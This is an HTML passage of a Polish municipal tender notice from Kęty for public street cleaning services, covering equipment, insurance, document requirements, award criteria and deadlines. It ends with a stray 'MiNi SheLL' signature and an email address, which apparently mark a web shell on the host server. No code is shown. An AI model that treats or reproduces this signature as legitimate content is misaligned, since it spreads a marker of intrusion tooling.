<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca wykaże, że dysponuje: 1) specjalistycznym, wielofunkcyjnym pojazdem mechanicznym wyposażonym w podzespoły i oprzyrządowanie: szczotki tarczowe z układem dysz natryskowych do zwilżania i wiązania pyłu zamiatanej, czyszczonej powierzchni chodników i parkingów przednia szczotka frezowa ręczny wąż ssawny do efektywnego zbierania zanieczyszczeń, liści etc. myjka ciśnieniowa do mycia i oczyszczania powierzchni z zabrudzeń szczotki do odmiatania śniegu pług do odgarniania i przerzucania śniegu piaskarka do posypywania parkingów i chodników w okresie zimowym Dopuszczalny całkowity ciężar urządzenia nie może przekraczać 2500 kg. 2) następującymi pojazdami, narzędziami urządzeniami: samochód specjalistyczny o masie do 3,5 do zbierania i wywozu nieczystości stałych - 1 szt. samochód o nadwoziu skrzyniowym - 1 szt. opłużony ciągnik z napędem na 4 koła - 1 szt. kosa żyłkowa spalinowa do wykaszania traw - 2 szt. dmuchawo - odkurzacz spalinowy - 1 szt. Wykaz sprzętu stanowi załącznik nr 7 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca przedstawi opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej w przedmiotem zamówienia na kwotę minimum 140.000,00 zł (w przypadku braku potwierdzenia w treści polisy jej opłaty, należy załączyć dokumenty, które będą ten fakt potwierdzać).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zamawiający wymaga, aby w wykazie usług Wykonawca wykazał, iż wykonał co najmniej dwie usługi polegające na utrzymaniu w czystości terenów publicznych, opróżniania koszy ulicznych o wartości nie mniejszej niż 140.000,00 zł dla każdej z usług;;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) wypełniony i podpisany przez osoby upoważnione do reprezentowania wykonawcy formularz oferty według wzoru stanowiącego załącznik nr 1 do SIWZ; b) wykaz części zamówienia, które Wykonawca zamierza powierzyć podwykonawcom (jeżeli dotyczy) - druk wykazu ujęto w załączniku nr 5 do SIWZ; c) upoważnienie do sporządzenia i podpisania oferty, jej załączników oraz wszystkich oświadczeń i dokumentów, jeżeli ofertę podpisuje osoba upoważniona przez osobę lub osoby uprawnione do reprezentowania firmy w sposób określony w akcie rejestrowym. Upoważnienie osób podpisujących ofertę do jej podpisania musi bezpośrednio wynikać z dokumentów dołączonych do oferty. Oznacza to, że jeżeli upoważnienie takie nie wynika wprost z dokumentu stwierdzającego status prawny wykonawcy, to do oferty należy dołączyć stosowne pełnomocnictwo w formie oryginału lub kserokopii potwierdzonej notarialnie. Wobec Wykonawcy będącego spółką cywilną dopuszcza się dołączenie umowy spółki cywilnej, z której będzie wynikać stosowne upoważnienie. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski. Wymagania stawiane wykonawcom wspólnie ubiegającym się o udzielenie zamówienia: 1) do oferty musi być dołączone stosowne pełnomocnictwo do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, podpisane przez osoby upoważnione do składania oświadczeń woli każdego ze wspólników; Pełnomocnictwo może zostać przedłożone w formie oryginału lub kserokopii potwierdzonej notarialnie; 2) w przypadku składania oferty wspólnej przez kilku przedsiębiorców (tzw. konsorcjum) lub przez spółkę cywilną, każdy ze wspólników konsorcjum lub spółki cywilnej zobowiązany jest dołączyć dokumenty wymienione w pkt. 2 (lub w pkt 3 - jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej). Pozostałe dokumenty będą traktowane jako wspólne. Zgodnie z art. 23 ust. 4 ustawy Prawo zamówień Publicznych, jeżeli taka oferta zostanie wybrana, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku gdy wykonawca polega na zasobach innych podmiotów, kopie dokumentów dotyczących odpowiednio wspólników konsorcjum lub tych podmiotów są poświadczane za zgodność z oryginałem przez wspólników konsorcjum (każdy w odniesieniu do dotyczących go dokumentów) lub przez pełnomocnika konsorcjum, jeżeli będzie miał do tej czynności upoważnienie, a w odniesieniu do innych podmiotów przez upoważnionych przedstawicieli tych podmiotów (każdy w odniesieniu do dotyczących go dokumentów). Dokumenty podmiotów zagranicznych 1) Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w części VI pkt 2 ppkt. 2,3,4 SIWZ składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: a) nie otwarto jego likwidacji ani nie ogłoszono upadłości, b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymani w całości wykonania decyzji właściwego organu, wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 2) Dokument, o którym mowa w części VI pkt 3, ppkt 1, lit. a) SIWZ, powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w pkt 3, ppkt 1, lit. b) nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 3) Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ppkt 1 lit. a i b zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Przepis pkt 2 stosuje się odpowiednio.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Jakość - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy w okolicznościach podanych poniżej: 1) Zmiana terminu wykonania umowy może nastąpić w przypadku: a) wystąpienia siły wyższej, przez którą należy rozumieć zdarzenie bądź połączenie zdarzeń zewnętrznych, obiektywnie niezależnych od Zamawiającego lub Wykonawcy, które zasadniczo i istotnie uniemożliwiają wykonywanie części lub całości zobowiązań wynikających z Umowy, których nie można było przewidzieć i którym Zamawiający i/lub Wykonawca nie mogli zapobiec ani ich przezwyciężyć i im przeciwdziałać, b) działania osób trzecich albo innych zdarzeń, które uniemożliwiają wykonanie części lub całości zobowiązań wynikających z Umowy w terminie lub mogących negatywnie wpływać na jakość wykonywanych prac, 2) Zmiana zakresu rzeczowego usług może nastąpić w przypadku: a) przejęcia w zarząd lub oddania innej jednostce części dróg, ulic, placów itp. podlegających utrzymaniu - zakres do 5% całości zakresu świadczonych usług nie podlega zmianie ceny; w przypadku zmiany wykraczającej ponad 5% zakresu, określona w ofercie cena zostanie przeliczona proporcjonalnie w zależności od zwiększenia lub zmniejszenia zakresu zamówienia, b) likwidacji lub rozwiązania firmy Wykonawcy 3) Zmiana wynagrodzenia Wykonawcy (ceny podanej w ofercie) może nastąpić w przypadku: a) zmiany stawek podatku VAT, b) likwidacji lub rozwiązania firmy Wykonawcy 4) Inne zmiany: a) zmiany osób kluczowych biorących udział w realizacji przedmiotu umowy b) zmiany siedziby (adresu) Zamawiającego lub Wykonawcy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kety.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kęty, Rynek 7, 32-650 Kęty..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.12.2015 godzina 09:45, miejsce: Urząd Gminy Kęty, Rynek 7, 32-650 Kęty, dziennik podawczy..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com